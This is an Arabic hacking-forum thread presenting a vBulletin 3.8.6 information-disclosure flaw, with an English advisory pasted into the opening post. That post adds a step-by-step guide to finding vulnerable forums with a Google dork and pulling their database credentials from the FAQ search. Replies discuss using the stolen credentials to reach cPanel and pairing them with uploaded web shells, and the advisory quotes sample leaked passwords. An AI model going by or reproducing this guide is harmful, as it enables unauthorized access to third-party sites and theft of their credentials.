development-point

development-point (https://vb.development-point.com/index.php)
-   قسم الثغـرات (https://vb.development-point.com/forumdisplay.php?f=64)
-   -   ثغرة سكربت vBulletin 3.8.6 (https://vb.development-point.com/showthread.php?t=8886)

mahmodemos 04-19-2013 09:54 AM
ثغرة سكربت vBulletin 3.8.6
 
بسم الله الرحمن الرحيم

الــسلام عليكم ورحمة الله وبركاته

كيف حالكم ؟؟


http://im42.gulfup.com/GxMpK.gif

الثغرة بسيطة جدا وما تحتاج شغل كثير

الثغرة :

كود PHP:
   010101010101010101010101010101010101010101010101010101010    
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                   
# Date: 24/07/2010                             
# Author: H-SK33PY                      
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
Is perhaps one or the other knownbut I find that really interesting that a great and mighty forum software like vBulletin can undermine the mistake that the MySQL password for any person to be visible.
 
The issue has been published this afternoon and vBulletin responded with a patch on it.
 
The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases.
 
Where are the gaps?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this from now?
We look for a forum, which is affected by this vulnerability, click above on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then "Database"
(or database) and a then see, aha, first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Respectively English beeen at a board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
On what to do with it, I think I need not dwell on it.
 
How do I protect myself?
As already posted a patch from the official vBulletin site, or by a MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &  all iranian datacoders members
 
############################################################################# 
http://im42.gulfup.com/GxMpK.gif

بعضنا لا يعلم كيف يستغل الثغرة

هذه طريقة الاستغلال :

ادخل اي منتدى نسخته 3.8.6

*ويمكنك البحث في قوقل
اكتب هذه الكلمة في جوجل

Powered by vBulletin™ Version 3.8.6

رابط المنتدى يكون كذا :

www.Examole.com/vb

انت ضيف بعد vb/
هذه الكلمة
faq.php
ليصبح الرابط هكذا
www.example.com/vb/faq.php

الان في صندوق البحث

ابحث عن كلمة :
Database

ستحصل على المعلمومات

الصورة توضح اكثر

http://im34.gulfup.com/vAdRE.jpg


ومبروك عليك :)

Da.MaSk 05-01-2013 09:59 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
وين لوحة التحكم طيب

mahmodemos 05-01-2013 10:02 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
اخي العزيز انتا مش رح توصل للوحة التحكم


انتا الان اخذت معلومات قاعدة البيانات

وتقدر تدخل للــ cpanel

سآرة 05-01-2013 10:07 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
ما شاء الله عليك
كل يوم شيئ جديد
انا فخورة اني موجودة بين عمالقة الابداع
شكرا لك
تم التقيم

i7rbi 06-25-2013 01:13 AM
رد: ثغرة سكربت vBulletin 3.8.6
 
السلام عليكم
أخوي اعتقد انهم رقعوا هذي الثغره ولم تعد صالحه
وآسف ان كنت مخطأ في هذا (الاعتقاد)

ddt 06-25-2013 03:53 AM
رد: ثغرة سكربت vBulletin 3.8.6
 
اقتباس:
المشاركة الأصلية كتبت بواسطة i7rbi (المشاركة 37364)
السلام عليكم
أخوي اعتقد انهم رقعوا هذي الثغره ولم تعد صالحه
وآسف ان كنت مخطأ في هذا (الاعتقاد)
لاحظ تاريخ وضع الموضوع

منذ /04-19-2013, 09:54 AM
:SnipeR (69):

ddt 06-25-2013 04:02 AM
رد: ثغرة سكربت vBulletin 3.8.6
 
هي بالفعل مرقعة لكن ليس في كل المنتديات

بس كيف اعرف رابط السي بانل بعد ما استخرجت البيانات ؟ لانه مكتوب

host:localhost

بس اليوزر والباس موجودين

ElSyad 07-19-2013 08:34 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
ثغرة الفاك يمكن الثغرة الي شغالة اليومين دول
بس ي حبي ممكن تكون البيانات صحيحة او تكون وهمية
تفيدك اكتر لو معاك شيل ع السيرفر
ودي لك وثغرة حلوة

mahmodemos 07-19-2013 10:51 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
اقتباس:
المشاركة الأصلية كتبت بواسطة ElSyad (المشاركة 41233)
ثغرة الفاك يمكن الثغرة الي شغالة اليومين دول
بس ي حبي ممكن تكون البيانات صحيحة او تكون وهمية
تفيدك اكتر لو معاك شيل ع السيرفر
ودي لك وثغرة حلوة

اشكرك على الرد

:SnipeR (69):

GENERAL AMERICA 07-30-2013 06:56 AM
رد: ثغرة سكربت vBulletin 3.8.6
 
يعطيك العافية اخي محمود بارك الله فيك

][Black-Heart][ 08-16-2013 12:07 AM
رد: ثغرة سكربت vBulletin 3.8.6
 
اخواني هذي الثغرة تفيدك بعد رفع الشل في الاتصال بقاعدة البيانات ذذ

GENERAL BAGHDAD 11-13-2013 05:16 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
يعطيك العافية حبيبي محمود على الابداع سلمت ايدك ~

box 11-13-2013 07:16 PM
رد: ثغرة سكربت vBulletin 3.8.6
 
حلو نعرف هذي الثغرة ولكن بي بعض الاحيان ما تتطلع اذا الهكر رفع شل على نفس سيرفر
تحميل الاستايل تحصل الكوفيج
vb.zip
شكراً على طرح الموضوع تحياتي


الساعة الآن 04:34 AM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47